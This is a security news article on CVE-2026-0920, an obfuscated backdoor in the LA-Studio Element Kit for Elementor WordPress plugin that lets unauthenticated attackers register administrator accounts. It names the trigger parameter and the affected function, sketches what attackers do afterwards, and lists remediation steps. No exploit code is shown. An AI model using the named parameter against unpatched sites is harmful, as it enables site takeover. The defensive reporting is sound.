editorially independent. We may make money when you click on links
to our partners.
Learn More
A WordPress plugin flaw puts thousands of websites one step away from full compromise by letting attackers create administrator accounts without logging in.
The issue affects the LA-Studio Element Kit for Elementor plugin that has 20,000+ active installs, and it enables unauthenticated admin user creation through a hidden backdoor.
“Once an attacker has gained administrative user access to a WordPress site they can then manipulate anything on the targeted site as a normal administrator would,” said Wordfence in its advisory.
How CVE-2026-0920 Works
The vulnerability, tracked as CVE-2026-0920, has been assigned a CVSS score of 9.8.
Researchers traced the flaw to the plugin’s user registration workflow, specifically within the ajax_register_handle function.
There, they found obfuscated backdoor logic designed to look like normal registration code while secretly checking for a hidden request parameter: lakit_bkrole.
If an attacker submits a specially crafted registration request containing that parameter, the plugin quietly triggers additional filters that assign administrator privileges to the newly created account.
In practical terms, this transforms a routine “create user” action into an unauthenticated privilege escalation path, allowing the attacker to gain full control of the WordPress dashboard without needing valid credentials.
With administrator access, an attacker can move quickly from account creation to full compromise.
Follow-on actions for threat actors can include installing malicious plugins or web shells, modifying site content to deliver malware, redirecting visitors to phishing pages, and injecting SEO spam designed to monetize traffic or manipulate search rankings.
Attackers can also establish long-term persistence by creating additional admin accounts, scheduling automated tasks, or making configuration changes.
Wordfence noted the backdoor was deliberately hidden through obfuscation techniques such as string manipulation and indirect function calls.
This approach makes malicious behavior more difficult to spot during routine reviews and allows it to blend into legitimate registration handling.
LA-Studio has released a patch for the vulnerability and Wordfence has released a firewall rule on their end to help protect against exploitation.
Security Controls to Reduce Blast Radius
If your organization runs WordPress, it’s worth addressing this vulnerability quickly and methodically.
Because the issue can allow unauthorized administrator account creation, remediation should include more than just applying the update.
- Patch immediately by upgrading LA-Studio Element Kit for Elementor to version 1.6.0 or later.
- Audit WordPress users for unauthorized administrator accounts and remove any suspicious or unexpected admins.
- Inspect for persistence by reviewing recent plugin/theme installs, file changes (wp-config.php, .htaccess), cron jobs, and uploads in wp-content.
- Rotate credentials, enforce MFA, and reduce privileged access using least privilege and limited admin accounts.
- Restrict access to wp-admin and wp-login.php using IP allowlisting, VPN access, or additional authentication controls.
- Enable centralized logging and monitoring to detect abnormal registration requests, admin role changes, and unusual outbound traffic.
- Validate backups and regularly test incident response plans, including restore and rollback procedures for WordPress compromises.
These steps combine patching, account review, and basic integrity checks to confirm the site hasn’t been altered.
Plugin Security Is Site Security
For organizations that rely on WordPress and third-party plugins, CVE-2026-0920 is a reminder that a single compromised component can quickly become a full-site security issue.
Treat plugin updates as part of your overall security posture, not routine maintenance, and validate changes before and after deployment.
Vulnerabilities like this are a reminder why organizations are adopting zero-trust approaches to limit blast radius when any component is compromised.
